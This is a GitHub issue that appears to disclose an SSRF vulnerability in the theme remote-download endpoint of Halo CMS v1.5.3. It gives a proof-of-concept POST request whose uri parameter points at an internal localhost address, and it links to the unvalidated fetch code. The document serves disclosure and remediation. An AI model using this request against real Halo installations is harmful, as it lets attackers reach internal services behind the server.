There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3 in halo-dev/halo

https://github.com/halo-dev/halo/


There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3. The attacker needs to enter a link that ends with a zip , such as http://127.0.0.1:40001/1.zip

### Proof of Concept
```
POST /api/admin/themes/fetching?uri=http://127.0.0.1:40000/1.zip HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 2
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node08slatpind75xksvtriiymt214.node0
Connection: close

{
```

![image](https://user-images.githubusercontent.com/34082644/172118182-06e1a237-82b8-402e-ba8c-23437e648f5d.png)
![image](https://user-images.githubusercontent.com/34082644/172117731-a7d22fb1-4775-47b9-a053-c82804acc27e.png)



[permalink:  ZipThemeFetcher.java#L43](https://github.com/halo-dev/halo/blob/352d9d4e2002b3bf8ffa5dfd956c228341519a45/src/main/java/run/halo/app/theme/ZipThemeFetcher.java#L43)
The destination address is not limited in the code, so it can cause ssrf vulnerability
![image](https://user-images.githubusercontent.com/34082644/172117947-a40e0bf7-2cca-4b50-b7f6-19d908da6996.png)




Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There is an ssrf vulnerability in the template remote download function in halo cms v1.5.3 in halo-dev/halo #2

Proof of Concept

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development